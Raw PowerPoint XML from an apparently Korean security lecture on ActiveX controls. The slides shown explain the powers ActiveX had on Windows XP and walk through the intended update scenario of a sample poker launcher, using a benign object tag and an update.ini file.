            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000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슬라이드 번호 개체 틀 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4051300" y="7237413"/>
            <a:ext cx="2493963" cy="32385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1306" tIns="45654" rIns="91306" bIns="45654"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr latinLnBrk="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{BA9AA466-BAAA-49C4-8D37-C99AA808569E}" type="slidenum">
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" b="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:pPr latinLnBrk="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:defRPr/>
              </a:pPr>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" b="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14339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ko-KR" dirty="0" smtClean="0"/>
              <a:t>ActiveX Control and Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340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/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Definition: An object executable in web pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>On Windows XP and earlier versions, an ActiveX control can</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Create/read/delete files in client systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Create/read/delete registry keys in client systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Execute/terminate programs in client systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Therefore, when abused, ActiveX controls pose serious security threat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슬라이드 번호 개체 틀 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4051300" y="7237413"/>
            <a:ext cx="2493963" cy="32385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1306" tIns="45654" rIns="91306" bIns="45654"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr latinLnBrk="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{F4803235-4730-4CFA-B11F-075CD263A1E7}" type="slidenum">
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" b="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:pPr latinLnBrk="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:defRPr/>
              </a:pPr>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" b="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15364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ko-KR" dirty="0" smtClean="0"/>
              <a:t>ActiveX Control: Intended Scenario</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15365" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295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pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-285750" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-285750" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-285750" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15366" name="Picture 10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gray">
          <a:xfrm>
            <a:off x="488916" y="1636713"/>
            <a:ext cx="2571750" cy="20701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sp>
        <p:nvSpPr>
          <p:cNvPr id="15367" name="사각형 설명선 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1489048" y="4067175"/>
            <a:ext cx="8786873" cy="2714625"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8745"/>
              <a:gd name="adj2" fmla="val -59741"/>
            </a:avLst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  <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0"/>
              <a:t>object id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0" smtClean="0"/>
              <a:t>="PokerLauncher" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0" err="1"/>
              <a:t>classid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>clsid:xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0" smtClean="0"/>
              <a:t>        codebase="http://online.game.com/PokerLauncher.cab"&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0"/>
              <a:t>	&lt;param name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0" smtClean="0"/>
              <a:t>="Server" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0"/>
              <a:t>value="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0" smtClean="0"/>
              <a:t>update.server.com/"&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0"/>
              <a:t>&lt;/object&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>PokerLauncher.StartGame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0"/>
              <a:t>("poker.exe");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0"/>
              <a:t>&lt;/script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" b="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15368" name="AutoShape 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3746514" y="1779588"/>
            <a:ext cx="3600450" cy="720725"/>
          </a:xfrm>
          <a:prstGeom prst="chevron">
            <a:avLst>
              <a:gd name="adj" fmla="val 33304"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="3175">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="220073" tIns="52818" rIns="98082" bIns="49041" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="125413" indent="-125413" defTabSz="881063"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" noProof="1" smtClean="0"/>
              <a:t>Visit the game site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="125413" indent="-125413" defTabSz="881063"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" noProof="1" smtClean="0"/>
              <a:t>to play poker online</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" noProof="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="AutoShape 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3718406" y="2917755"/>
            <a:ext cx="3600000" cy="720000"/>
          </a:xfrm>
          <a:prstGeom prst="chevron">
            <a:avLst>
              <a:gd name="adj" fmla="val 33333"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="3175">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
          <a:scene3d>
            <a:camera prst="orthographicFront">
              <a:rot lat="0" lon="10799999" rev="0"/>
            </a:camera>
            <a:lightRig rig="threePt" dir="t"/>
          </a:scene3d>
          <a:sp3d/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="220073" tIns="52818" rIns="98082" bIns="49041" anchor="ctr">
            <a:flatTx/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="125413" indent="-125413" defTabSz="881063">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" noProof="1" smtClean="0"/>
              <a:t>Web page </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" noProof="1"/>
              <a:t>to instantiate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="125413" indent="-125413" defTabSz="881063">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" noProof="1" smtClean="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" noProof="1"/>
              <a:t>ActiveX control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 2" descr="C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\j0285750.wm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904890" y="1637491"/>
            <a:ext cx="2942536" cy="2143140"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="그룹 15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="399799" y="3994945"/>
            <a:ext cx="1114408" cy="1183668"/>
            <a:chOff x="399799" y="3994945"/>
            <a:chExt cx="1114408" cy="1183668"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13" name="Picture 13" descr="C:\Documents and Settings\sweetlie\Local Settings\Temporary Internet Files\Content.IE5\NOBCR1O3\MCj02899620000[1].wmf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560353" y="3994945"/>
              <a:ext cx="806929" cy="10001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5" name="TextBox 12"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="399799" y="4932392"/>
              <a:ext cx="1114408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ko-KR" sz="1000" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>PokerLauncher</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custData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53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53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7" grpId="0" animBg="1"/>
      <p:bldP spid="15368" grpId="2" animBg="1"/>
      <p:bldP spid="1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슬라이드 번호 개체 틀 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4051300" y="7237413"/>
            <a:ext cx="2493963" cy="32385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1306" tIns="45654" rIns="91306" bIns="45654"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr latinLnBrk="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{2F975C0B-EAFB-45B3-BB36-0BD5688E730D}" type="slidenum">
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" b="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:pPr latinLnBrk="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:defRPr/>
              </a:pPr>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" b="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16387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ko-KR" dirty="0" smtClean="0"/>
              <a:t>ActiveX Control: Intended Scenario</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16388" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295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pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-285750" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-285750" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-285750" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16390" name="Picture 10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gray">
          <a:xfrm>
            <a:off x="488916" y="1636713"/>
            <a:ext cx="2571750" cy="20701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sp>
        <p:nvSpPr>
          <p:cNvPr id="16391" name="AutoShape 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4318018" y="1779588"/>
            <a:ext cx="3600450" cy="720725"/>
          </a:xfrm>
          <a:prstGeom prst="chevron">
            <a:avLst>
              <a:gd name="adj" fmla="val 33304"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="3175">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="220073" tIns="52818" rIns="98082" bIns="49041" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="125413" indent="-125413" defTabSz="881063"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" noProof="1"/>
              <a:t>Request </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" noProof="1" smtClean="0"/>
              <a:t>update.ini</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" noProof="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="AutoShape 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4289910" y="2917755"/>
            <a:ext cx="3600000" cy="720000"/>
          </a:xfrm>
          <a:prstGeom prst="chevron">
            <a:avLst>
              <a:gd name="adj" fmla="val 33333"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="3175">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
          <a:scene3d>
            <a:camera prst="orthographicFront">
              <a:rot lat="0" lon="10799999" rev="0"/>
            </a:camera>
            <a:lightRig rig="threePt" dir="t"/>
          </a:scene3d>
          <a:sp3d/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="220073" tIns="52818" rIns="98082" bIns="49041" anchor="ctr">
            <a:flatTx/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="125413" indent="-125413" defTabSz="881063">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" noProof="1"/>
              <a:t>update.ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" noProof="1" smtClean="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" noProof="1"/>
              <a:t>contain </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="125413" indent="-125413" defTabSz="881063">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" noProof="1" smtClean="0"/>
              <a:t>update information</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16395" name="사각형 설명선 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4989538" y="4067175"/>
            <a:ext cx="3929062" cy="2357438"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8606"/>
              <a:gd name="adj2" fmla="val -65995"/>
            </a:avLst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  <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="800" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="0" dirty="0" err="1"/>
              <a:t>FileVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="0" dirty="0"/>
              <a:t>=3.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>FileName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="0" dirty="0" smtClean="0"/>
              <a:t>=poker.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>FileSize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="0" dirty="0" smtClean="0"/>
              <a:t>=2524</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>DownFileName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="0" dirty="0" smtClean="0"/>
              <a:t>=poker.zip</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>DownFileSize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="0" dirty="0" smtClean="0"/>
              <a:t>=1530</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="그룹 14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2900129" y="1967812"/>
            <a:ext cx="1361942" cy="1741381"/>
            <a:chOff x="2900129" y="1967812"/>
            <a:chExt cx="1361942" cy="1741381"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="16398" name="Picture 13" descr="C:\Documents and Settings\sweetlie\Local Settings\Temporary Internet Files\Content.IE5\NOBCR1O3\MCj02899620000[1].wmf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2905118" y="1967812"/>
              <a:ext cx="1356953" cy="16818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6399" name="TextBox 12"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2900129" y="3432194"/>
              <a:ext cx="1303563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ko-KR" sz="1200" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>PokerLauncher</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 2" descr="C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\j0285750.wmf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904890" y="1637491"/>
            <a:ext cx="2942536" cy="2143140"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16396" name="직사각형 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="488916" y="1993900"/>
            <a:ext cx="2928958" cy="1631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en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;object id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
